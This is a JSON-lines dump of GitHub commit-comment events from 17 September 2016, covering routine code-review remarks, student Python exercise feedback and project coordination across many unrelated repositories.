{"id":"4577955458","type":"CommitCommentEvent","actor":{"login":"Kagami"},"repo":{"name":"4re/vapoursynth-portage"},"payload":{"comment":{"id":19064672,"position":19,"line":19,"path":"media-plugins/vapoursynth-qrcodesource/vapoursynth-qrcodesource-9999.ebuild","commit_id":"2afc0a246a54ea7cef48285fbd16804ad663488c","created_at":"2016-09-17T13:26:10Z","updated_at":"2016-09-17T13:26:10Z","body":"There is [media-gfx/qrencode](https://packages.gentoo.org/packages/media-gfx/qrencode) in official repos. Wrong version?"}},"created_at":"2016-09-17T13:26:10Z"}
{"id":"4577955907","type":"CommitCommentEvent","actor":{"login":"str1py"},"repo":{"name":"str1py/AnastasiaAssistantProject"},"payload":{"comment":{"id":19064673,"position":2,"line":2,"path":"README.md","commit_id":"26cee9dbb4899e616e2f9b5a11130efe705091b8","created_at":"2016-09-17T13:26:32Z","updated_at":"2016-09-17T13:26:32Z","body":"Trying to add languages"}},"created_at":"2016-09-17T13:26:32Z"}
{"id":"4577958382","type":"CommitCommentEvent","actor":{"login":"mynewword"},"repo":{"name":"mynewword/studygit"},"payload":{"comment":{"id":19064680,"position":null,"line":null,"path":null,"commit_id":"ebd3540fb263baf4db0a87a7f82fc5a048ebbb2d","created_at":"2016-09-17T13:28:21Z","updated_at":"2016-09-17T13:28:21Z","body":"good"}},"created_at":"2016-09-17T13:28:21Z"}
{"id":"4577958645","type":"CommitCommentEvent","actor":{"login":"bill-mybiz"},"repo":{"name":"ibgib/ibgib"},"payload":{"comment":{"id":19064681,"position":null,"line":null,"path":null,"commit_id":"566c5c5e80e43147554a06d48c45bd07ecf2542f","created_at":"2016-09-17T13:28:32Z","updated_at":"2016-09-17T13:28:32Z","body":"The sketch I drew in the commit msg is actually wrong. Here is what it should look like:\r\n```\r\nA   A'\r\n*---*\r\n    | \\\r\n    *---*\r\n    B   B'\r\n```\r\nSo, I will change the rel8 where it only affects one at a time. So here are the steps:\r\n\r\n1) Relate A to B. \r\n  * A is changed to have a relation with B.\r\n  * B is **not** changed.\r\n  * A { rel8d: [] }\r\n  * B { rel8d: [] }\r\n  * A' { rel8d: [B] }\r\n  * B' (doesn't exist)\r\n\r\n2) Relate B to A'.\r\n  * B is changed to have a relation with A' (_not A_).\r\n  * A' is **not** changed.\r\n  * So A' is **still** related to B, not B'.\r\n    * But B' has a relation to A', which **does** have a reciprocal relation to B' ancestor (B).\r\n  * A { rel8d: [] }\r\n  * B { rel8d: [] }\r\n  * A' { rel8d: [B] }\r\n  * B' { rel8d: [A'] }\r\n"}},"created_at":"2016-09-17T13:28:32Z"}
{"id":"4577958790","type":"CommitCommentEvent","actor":{"login":"echin6"},"repo":{"name":"echin6/dsp"},"payload":{"comment":{"id":19064682,"position":null,"line":null,"path":null,"commit_id":"73e9a483d3cd321fe1f8919f3554debb24073c99","created_at":"2016-09-17T13:28:37Z","updated_at":"2016-09-17T13:28:37Z","body":"Thanks for your other comments.  The \"Raise NotImplementedError\" were not\nmy codes.  They were there in the original file and I just left them there.\n\n\nAlso I modified linear_merge function as follows:\n\ndef linear_merge(list1, list2):\n    sorted_list = []\n    while (list1 and list2):\n        if (list1[0] <= list2[0]):\n            i = list1.pop(0)\n            sorted_list.append(i)\n        else:\n            i = list2.pop(0)\n            sorted_list.append(i)\n\n    sorted_list.extend(list1 if list1 else list2)\n    return sorted_list\n\nIs this linear time?  Is there a way to measure how fast this function\nreturns versus the sorted() function?\n\nThanks,\nEd\n\nOn Fri, Sep 16, 2016 at 10:50 PM, Edwin Chin <echin6@gmail.com> wrote:\n\n> Here's the updated code for not_bad().  I forgot to define the not_index\n> and bad_index as global variables. Thanks for pointing it out.\n>\n> def not_bad(s):\n> t = []\n> t = s.split()\n> not_index = -1\n> bad_index = -1\n> for i in range(len(t)):\n> if t[i].find('not') >= 0:\n> not_index = t.index(t[i])\n> for i in range(len(t)):\n> if t[i].find('bad') >= 0:\n> bad_index = t.index(t[i])\n> if not_index >=0 and bad_index > not_index:\n> t[bad_index] = t[bad_index].replace('bad', 'good')\n> del t[not_index:bad_index]\n> print \" \".join(t)\n> else:\n> print \" \".join(t)\n>\n> On Fri, Sep 16, 2016 at 10:29 PM, Edwin Chin <echin6@gmail.com> wrote:\n>\n>> Here's an example of a list comprehension that substitutes for reduce():\n>>\n>> miles = [55, 65, 90, 100, 0, -50]\n>> sum_reduce = reduce(lambda x, y: x+y, miles)\n>> print sum_reduce\n>>\n>> sum_list = [x for x in [0] for y in miles for x in [x+y]][-1]\n>> print sum_list\n>>\n>> On Fri, Sep 16, 2016 at 4:23 PM, Luc Demortier <notifications@github.com>\n>> wrote:\n>>\n>>> RE: 05a-python.md\n>>> cc: @lucdemortier <https://github.com/lucdemortier> @reshamametis\n>>> <https://github.com/reshamametis> @aramnath\n>>> <https://github.com/aramnath> @gfsoileau <https://github.com/gfsoileau>\n>>> @julialintern <https://github.com/julialintern> @galvin-mj\n>>> <https://github.com/galvin-mj>\n>>>\n>>> Hello @echin6 <https://github.com/echin6>\n>>>\n>>> Nice work on Python! Here are some comments:\n>>>\n>>>    - Can you give an example of a list comprehension that substitutes\n>>>    for reduce()?\n>>>    - String functions (Q6) and list functions (Q7): you need to remove\n>>>    the raise NotImplementedError at the end of each routine, or else\n>>>    make it do something useful.\n>>>    - Function donuts: there is unnecessary indentation at line 7.\n>>>    - Function both_ends: unnecessary indentation at line 32.\n>>>    - Function both_ends: you can replace s[s_len-2:s_len] by s[-2:].\n>>>    - Converting strings to lists is not the most efficient way to\n>>>    manipulate strings. For example, the function mix_up(a,b) is most\n>>>    easily implemented by return b[:2]+a[2:]+' '+a[:2]+b[2:].\n>>>    - Function not_bad does not seem to be working on the examples\n>>>    given...\n>>>    - I like your implementation of function front_x(words)!\n>>>    - General comment about defining functions: end them with return s\n>>>    rather than print s (for example).\n>>>    - Function linear_merge: here you are just sorting the combined\n>>>    list, which takes an amount of time of order n*log(n) instead of\n>>>    order n, where n is the list length. Try to make use of the fact\n>>>    that the given lists list1 and list2 are already sorted to begin\n>>>    with.\n>>>    - For the parsing problem (Q8), remember to close a file that you\n>>>    opened with f = open('football.csv'). Or else use the construct with\n>>>    open('football.csv', 'r') as f:. In the latter case Python will\n>>>    close the file for you.\n>>>\n>>> 👍\n>>>\n>>> —\n>>> You are receiving this because you were mentioned.\n>>> Reply to this email directly, view it on GitHub\n>>> <https://github.com/echin6/dsp/commit/73e9a483d3cd321fe1f8919f3554debb24073c99#commitcomment-19059909>,\n>>> or mute the thread\n>>> <https://github.com/notifications/unsubscribe-auth/ATKi7t6cOzzreUIgyiDiQDCYGmZGDve3ks5qqvrYgaJpZM4J_UKL>\n>>> .\n>>>\n>>\n>>\n>\n"}},"created_at":"2016-09-17T13:28:37Z"}
{"id":"4577960720","type":"CommitCommentEvent","actor":{"login":"bdionne"},"repo":{"name":"protegeproject/protege-server"},"payload":{"comment":{"id":19064683,"position":null,"line":null,"path":null,"commit_id":"5d5e5559157d7e01bb3c5b30101484506674c0df","created_at":"2016-09-17T13:29:55Z","updated_at":"2016-09-17T13:29:55Z","body":"This function is never called by the `HTTP` server, so the metaproject change breaks the [client](https://github.com/protegeproject/protege-client/issues/70)."}},"created_at":"2016-09-17T13:29:55Z"}
{"id":"4577960722","type":"CommitCommentEvent","actor":{"login":"luixxiul"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19064684,"position":null,"line":null,"path":null,"commit_id":"6d0e2f616f41287c78ed7c48b816af08ba3e65f3","created_at":"2016-09-17T13:29:55Z","updated_at":"2016-09-17T13:29:55Z","body":"++"}},"created_at":"2016-09-17T13:29:55Z"}
{"id":"4577962887","type":"CommitCommentEvent","actor":{"login":"invy"},"repo":{"name":"elfmz/far2l"},"payload":{"comment":{"id":19064685,"position":null,"line":null,"path":null,"commit_id":"11b16ec03fb555482d76a63c2885d94a611ff18e","created_at":"2016-09-17T13:31:14Z","updated_at":"2016-09-17T13:31:14Z","body":"За что этот код отвечает и как он относится к rar файлам?"}},"created_at":"2016-09-17T13:31:14Z"}
{"id":"4577962999","type":"CommitCommentEvent","actor":{"login":"dssquared"},"repo":{"name":"dssquared/Networks_Lab1"},"payload":{"comment":{"id":19064686,"position":null,"line":null,"path":null,"commit_id":"7f5b3dc1ba8a89d303ffa5a927903a77492af920","created_at":"2016-09-17T13:31:19Z","updated_at":"2016-09-17T13:31:19Z","body":"I was thinking of having something modular(more methods) that could be\nmodified easier and easier for multiple people to work on. Server side\nwould have a main that  would start by reading the command line arguments,\nassigning arguments to variables, build board from incomming text file\nargument(board could be a 2d array), open network conneciton, then read the\nboard at x,y coords and return message. read_boardd(x,y){ return hit, miss,\nsink, repeat} hit miss sink repeat could be a string a char a bit, doesn't\nreally matter. update_board(x,y){record shot on board at x,y)\nreturn_message(message){send http reply to client} There could be a\nvariable named message, message = read_board(x,y) return_message(message){\nif message = hit return proper http reply if message = miss return proper\nhttp reply, if message...} The http replies could be separate methods too.\nSomeone could work on building the 2d array from the text file. Someone\ncould work on read_board() and update_board(). Someone could work on return\nmessage and http stuff. Once we get going people ca fill in where help is\nneeded. I don't mind what part I work on, I thought I could start on the\nhtttp and network stuff.\nWhat do you guys want to work on?  I will start on something an change or\nkeep working on it once I hear back.\n\nDavid\n\nOn Fri, Sep 16, 2016 at 7:13 PM, tyler-sassaman <notifications@github.com>\nwrote:\n\n> I uploaded a file with some chunks of code that are a start at a few\n> things, I am just not sure how to interface them with the rest of the\n> program. I think the easiest way to process a message is to parse the\n> message and call process with only the x and y values. How this would be\n> done I am not sure. I think a 2d array is the easiest way to maintain the\n> board and issue responses, and for each board query we can just create a\n> new board.txt file from the array.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dssquared/Networks_Lab1/commit/7f5b3dc1ba8a89d303ffa5a927903a77492af920#commitcomment-19062282>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AE8DG3Wt-M3m5PLng_3G-UL1D-aUKImWks5qqz6_gaJpZM4J_dYG>\n> .\n>\n"}},"created_at":"2016-09-17T13:31:19Z"}
{"id":"4577964119","type":"CommitCommentEvent","actor":{"login":"sjmcdowall"},"repo":{"name":"sindresorhus/camelcase-keys"},"payload":{"comment":{"id":19064687,"position":null,"line":null,"path":null,"commit_id":"94195701442b3ab257d17596a689780656a172ec","created_at":"2016-09-17T13:32:05Z","updated_at":"2016-09-17T13:32:05Z","body":"Oh that little ES6 Node 4 thing!?!?  :)  LOL  "}},"created_at":"2016-09-17T13:32:05Z"}
{"id":"4577964141","type":"CommitCommentEvent","actor":{"login":"bill-mybiz"},"repo":{"name":"ibgib/ibgib"},"payload":{"comment":{"id":19064688,"position":1,"line":17,"path":"ib_gib_umb/apps/ib_gib/lib/ib_gib/constants.ex","commit_id":"566c5c5e80e43147554a06d48c45bd07ecf2542f","created_at":"2016-09-17T13:32:06Z","updated_at":"2016-09-17T13:32:06Z","body":"SEE THE COMMENT OF THIS COMMIT AT BOTTOM!"}},"created_at":"2016-09-17T13:32:06Z"}
{"id":"4577964378","type":"CommitCommentEvent","actor":{"login":"AjitVBhise"},"repo":{"name":"AjitVBhise/array"},"payload":{"comment":{"id":19064689,"position":1,"line":1,"path":"src/Dulicate.java","commit_id":"54cc2049f8127c64630074b173123c17cb86516d","created_at":"2016-09-17T13:32:15Z","updated_at":"2016-09-17T13:32:15Z","body":"program on Array\r\n"}},"created_at":"2016-09-17T13:32:15Z"}
{"id":"4577965024","type":"CommitCommentEvent","actor":{"login":"kkos"},"repo":{"name":"kkos/oniguruma"},"payload":{"comment":{"id":19064690,"position":5,"line":367,"path":"src/oniguruma.h","commit_id":"c4be742e20cd74db2fa7aa4360172183b2b8169e","created_at":"2016-09-17T13:32:41Z","updated_at":"2016-09-17T13:32:41Z","body":"Thank you.\r\nI have fixed it in develop branch."}},"created_at":"2016-09-17T13:32:41Z"}
{"id":"4577966136","type":"CommitCommentEvent","actor":{"login":"Twintop"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":19064692,"position":null,"line":null,"path":null,"commit_id":"ab13410ad6b101c57ddfec6640a55649f0639704","created_at":"2016-09-17T13:33:31Z","updated_at":"2016-09-17T13:33:31Z","body":"This also adds hardcoding of the Mind Blast cooldown inside Voidform since the spell data is busted right now."}},"created_at":"2016-09-17T13:33:31Z"}
{"id":"4577966361","type":"CommitCommentEvent","actor":{"login":"MrMC"},"repo":{"name":"MrMC/mrmc"},"payload":{"comment":{"id":19064693,"position":20,"line":296,"path":"xbmc/pictures/GUIWindowSlideShow.cpp","commit_id":"221871b4ed891facec3cc8d7c7a085b52c64069e","created_at":"2016-09-17T13:33:40Z","updated_at":"2016-09-17T13:33:40Z","body":"I'll smack @amet with a trout :)"}},"created_at":"2016-09-17T13:33:40Z"}
{"id":"4577967191","type":"CommitCommentEvent","actor":{"login":"ccrisan"},"repo":{"name":"ccrisan/motioneyeos"},"payload":{"comment":{"id":19064695,"position":null,"line":null,"path":null,"commit_id":"7fe6ed1eb6ef2291b830c3711857595770f01f9d","created_at":"2016-09-17T13:34:14Z","updated_at":"2016-09-17T13:34:14Z","body":"See https://github.com/ccrisan/motioneyeos/wiki/FAQ#why-do-i-get-read-only-file-system-when-trying-to-edit-a-file and "}},"created_at":"2016-09-17T13:34:14Z"}
{"id":"4577967310","type":"CommitCommentEvent","actor":{"login":"garyfoster"},"repo":{"name":"radicalbear/rad-hoc"},"payload":{"comment":{"id":19064696,"position":34,"line":21,"path":"lib/rad_hoc/validator.rb","commit_id":"5e1fcba09eec87c929d6b952b7388782c465a736","created_at":"2016-09-17T13:34:19Z","updated_at":"2016-09-17T13:34:19Z","body":"@stephenmac7 this is a little wonky since it's duplicating that code to get the list of all models, feel free to refactor and cleanup"}},"created_at":"2016-09-17T13:34:19Z"}
{"id":"4577969309","type":"CommitCommentEvent","actor":{"login":"adrelanos"},"repo":{"name":"Whonix/control-port-filter-python"},"payload":{"comment":{"id":19064699,"position":186,"line":232,"path":"usr/sbin/cpfpd","commit_id":"e073189f6f96380b66b577d02cb6f87fe4761a82","created_at":"2016-09-17T13:35:36Z","updated_at":"2016-09-17T13:35:36Z","body":"What search terms / where can I read about this \"python garbage collector seemingly arbitrarily eats my variables\"?"}},"created_at":"2016-09-17T13:35:36Z"}
{"id":"4577971114","type":"CommitCommentEvent","actor":{"login":"marmarek"},"repo":{"name":"Whonix/control-port-filter-python"},"payload":{"comment":{"id":19064702,"position":186,"line":232,"path":"usr/sbin/cpfpd","commit_id":"e073189f6f96380b66b577d02cb6f87fe4761a82","created_at":"2016-09-17T13:36:44Z","updated_at":"2016-09-17T13:36:44Z","body":"The thing is you haven't created any variable."}},"created_at":"2016-09-17T13:36:44Z"}
{"id":"4577971891","type":"CommitCommentEvent","actor":{"login":"timelyportfolio"},"repo":{"name":"abresler/fundManageR"},"payload":{"comment":{"id":19064704,"position":13,"line":25,"path":"DESCRIPTION","commit_id":"3ec3765ceeccfc58de2bae92ac76edebf0a33e48","created_at":"2016-09-17T13:37:15Z","updated_at":"2016-09-17T13:37:15Z","body":"urltools\r\n\r\nI see the instructions to install all necessary packages, and yes they are on CRAN, but I suggest adding them to Imports or Suggests so they get installled automatically."}},"created_at":"2016-09-17T13:37:15Z"}
{"id":"4577972567","type":"CommitCommentEvent","actor":{"login":"raonian96"},"repo":{"name":"SHOM95/MakeThePath"},"payload":{"comment":{"id":19064705,"position":3,"line":4,"path":"README.md","commit_id":"7d2e12b210120ab6d608a0c4393132c5653d1f75","created_at":"2016-09-17T13:37:44Z","updated_at":"2016-09-17T13:37:44Z","body":"__컴퓨터전공 15학번 정원규__: [맵구성, 구글 로그인 및 랭킹, 업적 시스템 연동] 예전에 혼자 해보다 때려 쳤던 유니티와 에오스 여름 캠프 때 하다가 때려 쳤던 구글 연동을 다시 시도하게 되었습니다. 이번엔 좀 꾸준히 하길."}},"created_at":"2016-09-17T13:37:44Z"}
{"id":"4577973250","type":"CommitCommentEvent","actor":{"login":"echin6"},"repo":{"name":"echin6/dsp"},"payload":{"comment":{"id":19064706,"position":null,"line":null,"path":null,"commit_id":"83a21e5b9e118bb6e252661408c41565cbb9d927","created_at":"2016-09-17T13:38:09Z","updated_at":"2016-09-17T13:38:09Z","body":"Hi Luc,\n\n- Is there a preferred way to detect identical field values without going\nthrough the entire field and define equivalent fields manually?\n\n- For Q8, I run into issues sorting a dictionary that is unordered in\nnature.  While I have no problem sorting the first three last names using\nthe following code:\n\nlast_first3 = {k: last_dict[k] for k in sorted(last_dict.keys())[:3]}\n\nWhen I use the same code to sort the entire dictionary, I got a list that\nwas no longer sorted alphabetically.\n\nlast_dict_sorted = {k: last_dict[k] for k in sorted(last_dict.keys())}\n\nCould you tell me what I am missing?\n\nThanks,\nEdwin\n\n\n\n\n\n\n\n\nOn Fri, Sep 16, 2016 at 4:47 PM, Luc Demortier <notifications@github.com>\nwrote:\n\n> RE: 05b-python_advanced.md\n> cc: @lucdemortier <https://github.com/lucdemortier> @reshamametis\n> <https://github.com/reshamametis> @aramnath <https://github.com/aramnath>\n> @gfsoileau <https://github.com/gfsoileau> @julialintern\n> <https://github.com/julialintern> @galvin-mj\n> <https://github.com/galvin-mj>\n>\n> Hello @echin6 <https://github.com/echin6>\n>\n> Nice work on advanced Python! Some comments:\n>\n>    - Part of the exercises consists in using regular expressions to\n>    detect identical field values. For example, Ph.D. means the same thing\n>    as PhD or PhD.. Without taking this into account, counts are not very\n>    useful.\n>    - Nice use of Pandas to print pretty tables!\n>    - Write to csv file (Q5): You forgot to close the file faculty.csv\n>    with f.close().\n>    - For Q8, we wanted a dictionary whose keys include both first and\n>    last names, but ordered by last names.\n>\n> 👍\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/echin6/dsp/commit/83a21e5b9e118bb6e252661408c41565cbb9d927#commitcomment-19060187>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATKi7pEljopjDZhuCN9SqSwugAqgX9wDks5qqwBngaJpZM4J_VXg>\n> .\n>\n"}},"created_at":"2016-09-17T13:38:09Z"}
{"id":"4577976587","type":"CommitCommentEvent","actor":{"login":"co5mo"},"repo":{"name":"kodi-czsk/plugin.video.sosac.ph"},"payload":{"comment":{"id":19064708,"position":null,"line":null,"path":null,"commit_id":"224d227be7a3710ae683012389e3f3cb5cb3ed1a","created_at":"2016-09-17T13:40:29Z","updated_at":"2016-09-17T13:40:29Z","body":"@ExSport ok rozumiem je mozne ze len zaciatok scrapu trva dlhsie lebo tam je take velke mnozstvo adresarov\r\nja som vytvaral strm este pomocou mylibrary \r\nok tak predpokladam ze takto je to OK este rozmyslam ci by sa nehodila moznost scrapu jednotlivych zanrov z polozky by genres"}},"created_at":"2016-09-17T13:40:29Z"}
{"id":"4577977103","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19064712,"position":null,"line":null,"path":null,"commit_id":"1c33c36bb891fe38ad3053f26710b646c95859f7","created_at":"2016-09-17T13:40:52Z","updated_at":"2016-09-17T13:40:52Z","body":"Initial commit."}},"created_at":"2016-09-17T13:40:52Z"}
{"id":"4577978487","type":"CommitCommentEvent","actor":{"login":"gautamtalukdar"},"repo":{"name":"gautamtalukdar/Hello-World"},"payload":{"comment":{"id":19064718,"position":null,"line":null,"path":null,"commit_id":"bdee398e90fef8f27ae797de270594b80342d4bb","created_at":"2016-09-17T13:41:58Z","updated_at":"2016-09-17T13:41:58Z","body":"Testing 123"}},"created_at":"2016-09-17T13:41:58Z"}
{"id":"4577979514","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"ChikaraOSP/packages_apps_OmniSwitch"},"payload":{"comment":{"id":19064720,"position":null,"line":null,"path":null,"commit_id":"d7964cdefa0b49b5cb3a0cc82d294e62e077a562","created_at":"2016-09-17T13:42:43Z","updated_at":"2016-09-17T13:42:43Z","body":"Oops, we're tracking omnirom's OmniSwitch hehe, lemme fix that real quick."}},"created_at":"2016-09-17T13:42:43Z"}
{"id":"4577980371","type":"CommitCommentEvent","actor":{"login":"MarioPL98"},"repo":{"name":"EternalBlueFlame/Traincraft-5"},"payload":{"comment":{"id":19064721,"position":null,"line":null,"path":null,"commit_id":"3ed91687a3c65f8bf9098c0dfcafe9d45dfd8b3a","created_at":"2016-09-17T13:43:22Z","updated_at":"2016-09-17T13:43:22Z","body":"DAT WAS FAST, SENPAI"}},"created_at":"2016-09-17T13:43:22Z"}
{"id":"4577980734","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19064722,"position":null,"line":null,"path":null,"commit_id":"3594da34f08807753ce53dfcd4fe8149eda9a409","created_at":"2016-09-17T13:43:37Z","updated_at":"2016-09-17T13:43:37Z","body":"Initial commit."}},"created_at":"2016-09-17T13:43:37Z"}
{"id":"4577982115","type":"CommitCommentEvent","actor":{"login":"ccrisan"},"repo":{"name":"ccrisan/motioneye"},"payload":{"comment":{"id":19064724,"position":null,"line":null,"path":null,"commit_id":"8bfa621874a5078928687d89f3d517aeecfea7f0","created_at":"2016-09-17T13:44:34Z","updated_at":"2016-09-17T13:44:34Z","body":"It's a known issue. On motion version 3.4 the video quality setting has no effect when using mkv."}},"created_at":"2016-09-17T13:44:34Z"}
{"id":"4577982458","type":"CommitCommentEvent","actor":{"login":"Franklyn1987"},"repo":{"name":"qTox/qTox"},"payload":{"comment":{"id":19064725,"position":null,"line":null,"path":null,"commit_id":"fd04a2832aa885d260ded4e476eefcddd49237b3","created_at":"2016-09-17T13:44:50Z","updated_at":"2016-09-17T13:44:50Z","body":"The group has  a problem in that use id"}},"created_at":"2016-09-17T13:44:50Z"}
{"id":"4577982960","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19064726,"position":null,"line":null,"path":null,"commit_id":"3b88e44745f57a4a94776fb0369e7469189bb217","created_at":"2016-09-17T13:45:10Z","updated_at":"2016-09-17T13:45:10Z","body":"Initial commit\r\nmoneroj"}},"created_at":"2016-09-17T13:45:10Z"}
{"id":"4577983204","type":"CommitCommentEvent","actor":{"login":"Naithugo"},"repo":{"name":"Naithugo/mipsexercises"},"payload":{"comment":{"id":19064727,"position":3,"line":3,"path":"mips.s","commit_id":"0562e085ff546784f49bb0a3071c39de6621083a","created_at":"2016-09-17T13:45:18Z","updated_at":"2016-09-17T13:45:18Z","body":"What is this? //Bear"}},"created_at":"2016-09-17T13:45:18Z"}
{"id":"4577983988","type":"CommitCommentEvent","actor":{"login":"krysennn"},"repo":{"name":"Contentify/Contentify"},"payload":{"comment":{"id":19064729,"position":null,"line":null,"path":null,"commit_id":"e7163c6e72c1e63a86fce273e9cc92924a9b3c26","created_at":"2016-09-17T13:45:51Z","updated_at":"2016-09-17T13:45:51Z","body":"Really good nice ;)"}},"created_at":"2016-09-17T13:45:51Z"}
{"id":"4577987183","type":"CommitCommentEvent","actor":{"login":"d3m3vilurr"},"repo":{"name":"xyzz/vita-moonlight"},"payload":{"comment":{"id":19064731,"position":11,"line":52,"path":"src/input/vita.h","commit_id":"f48ffd950751381745421a9fde9e15e089e53c52","created_at":"2016-09-17T13:48:08Z","updated_at":"2016-09-17T13:48:08Z","body":"now it can change to enum instead define"}},"created_at":"2016-09-17T13:48:08Z"}
{"id":"4577988084","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19064732,"position":null,"line":null,"path":null,"commit_id":"1ee9e45cc52618439c213929e820de7bb7255b14","created_at":"2016-09-17T13:48:46Z","updated_at":"2016-09-17T13:48:46Z","body":"Initial commit.\r\n\r\nMONEROJ.TODAY"}},"created_at":"2016-09-17T13:48:46Z"}
{"id":"4577988302","type":"CommitCommentEvent","actor":{"login":"fecundf"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":19064733,"position":null,"line":null,"path":null,"commit_id":"4cc43eea89915303caa66ff3dffec94bae734393","created_at":"2016-09-17T13:48:53Z","updated_at":"2016-09-17T13:48:53Z","body":"While this corrects the result, it doesn't illustrate \"this operator is not arithmetically symmetrical (doesn't do ± Δ)\" from the sentence above. I think that was the point of that example."}},"created_at":"2016-09-17T13:48:53Z"}
{"id":"4577989013","type":"CommitCommentEvent","actor":{"login":"lieff"},"repo":{"name":"elfmz/far2l"},"payload":{"comment":{"id":19064734,"position":null,"line":null,"path":null,"commit_id":"11b16ec03fb555482d76a63c2885d94a611ff18e","created_at":"2016-09-17T13:49:26Z","updated_at":"2016-09-17T13:49:26Z","body":"Этот не rar, а custom плагин, где произвольный архиватор можно забить, в rar просто есть класс с таким же названием и там править больше. Оба плагина из-за этого сломались."}},"created_at":"2016-09-17T13:49:26Z"}
{"id":"4577989569","type":"CommitCommentEvent","actor":{"login":"poutsma"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":19064736,"position":33,"line":36,"path":"spring-web-reactive/src/main/java/org/springframework/web/reactive/function/BodyInsertor.java","commit_id":"3f5570641359b13c3d9139879c66500f31d007c5","created_at":"2016-09-17T13:49:43Z","updated_at":"2016-09-17T13:49:43Z","body":"Ok, I will change the name to `BodyInserter`"}},"created_at":"2016-09-17T13:49:43Z"}
{"id":"4577991205","type":"CommitCommentEvent","actor":{"login":"thanhthuy89"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":19064743,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-17T13:50:50Z","updated_at":"2016-09-17T13:50:50Z","body":"I can not flash it. please help me ( both twrp 3.0.2.0 & twrp 2.8.5.0"}},"created_at":"2016-09-17T13:50:50Z"}
{"id":"4577992066","type":"CommitCommentEvent","actor":{"login":"zbintliff"},"repo":{"name":"miasma-rb/miasma-aws"},"payload":{"comment":{"id":19064746,"position":60,"line":479,"path":"lib/miasma/contrib/aws.rb","commit_id":"1afab60d4d85e85de4cfdce7ffa92d7da60b58f9","created_at":"2016-09-17T13:51:24Z","updated_at":"2016-09-17T13:51:24Z","body":"I'm not sure if you want to join with the '/' as `ECS_TASK_PROFILE_PATH` already has the leading /"}},"created_at":"2016-09-17T13:51:24Z"}
{"id":"4577997414","type":"CommitCommentEvent","actor":{"login":"lfq7413"},"repo":{"name":"lfq7413/tomato"},"payload":{"comment":{"id":19064755,"position":43,"line":78,"path":"tomato.go","commit_id":"8a480d601839349134767c22b5700c08aca233d7","created_at":"2016-09-17T13:55:00Z","updated_at":"2016-09-17T13:55:00Z","body":"@umdp \r\n1. 写这段代码的时候就注意到了这个问题，当时没有合适的解决方案，暂时就这么写了\r\n2. 对于 RequestBody 的 Unmarshal 操作必须进行一次，如果只在此处处理，则在 controllers 中无法接收结果，所以 base.go 中的 Unmarshal 必须要保留\r\n3. 在此处获取 _method 的方法，只想到了另外两种：直接字符串搜索和正则表达式\r\n4. 经过对三种方式的性能测试发现，在最坏的情况下，Unmarshal 消耗的时间是 直接字符串搜索 的 10 倍以上，正则表达式 消耗的时间同样是 直接字符串搜索 的 10 倍以上\r\n5. 在最新的 commit 中采用了 直接字符串搜索 解决这个问题 "}},"created_at":"2016-09-17T13:55:00Z"}
{"id":"4577997582","type":"CommitCommentEvent","actor":{"login":"adellibovi"},"repo":{"name":"odigeoteam/TableViewKit"},"payload":{"comment":{"id":19064757,"position":null,"line":null,"path":null,"commit_id":"2e7c1161cb2aec25e5e735e384f7d5695b9202c1","created_at":"2016-09-17T13:55:08Z","updated_at":"2016-09-17T13:55:08Z","body":"#2 "}},"created_at":"2016-09-17T13:55:08Z"}
{"id":"4578004730","type":"CommitCommentEvent","actor":{"login":"KevinW1998"},"repo":{"name":"WohlSoft/PGE-Project"},"payload":{"comment":{"id":19064765,"position":19,"line":1016,"path":"Engine/graphics/gl_renderer.cpp","commit_id":"d9724488dce836915bd6828cf32a6455c8a42644","created_at":"2016-09-17T13:59:59Z","updated_at":"2016-09-17T13:59:59Z","body":"Personally I think the gif recorder should be stored as a object in the rended-class rather than a global object"}},"created_at":"2016-09-17T13:59:59Z"}
{"id":"4578007380","type":"CommitCommentEvent","actor":{"login":"ccrisan"},"repo":{"name":"ccrisan/motioneye"},"payload":{"comment":{"id":19064766,"position":null,"line":null,"path":null,"commit_id":"8bfa621874a5078928687d89f3d517aeecfea7f0","created_at":"2016-09-17T14:01:25Z","updated_at":"2016-09-17T14:01:25Z","body":"I have sent patches and they have been taken into consideration most likely for the next version. In the meantime you could apply the patch manually as I do for the motionEyeOS distro. See https://github.com/ccrisan/motioneyeos/blob/master/package/motion-mrdave/001-h264-crf-from-vbr.patch."}},"created_at":"2016-09-17T14:01:25Z"}
{"id":"4578007518","type":"CommitCommentEvent","actor":{"login":"NitroxydeX"},"repo":{"name":"EternalBlueFlame/Traincraft-5"},"payload":{"comment":{"id":19064767,"position":202,"line":1244,"path":"src/main/java/train/common/entity/rollingStock/EntityTracksBuilder.java","commit_id":"be6e8fcf404dee0972fdac4d3cab8c8f9cc889dd","created_at":"2016-09-17T14:01:31Z","updated_at":"2016-09-17T14:01:31Z","body":"We should check everything related to north/south. The Values are wrong. north would be i - 1 and south would be i + 1"}},"created_at":"2016-09-17T14:01:31Z"}
{"id":"4578009094","type":"CommitCommentEvent","actor":{"login":"krlmlr"},"repo":{"name":"klutometis/roxygen"},"payload":{"comment":{"id":19064771,"position":2,"line":37,"path":"NEWS.md","commit_id":"3dfd4b8b66be82a2bc407b311d4653be7ef343b6","created_at":"2016-09-17T14:02:39Z","updated_at":"2016-09-17T14:02:39Z","body":"I think this header should go away."}},"created_at":"2016-09-17T14:02:39Z"}
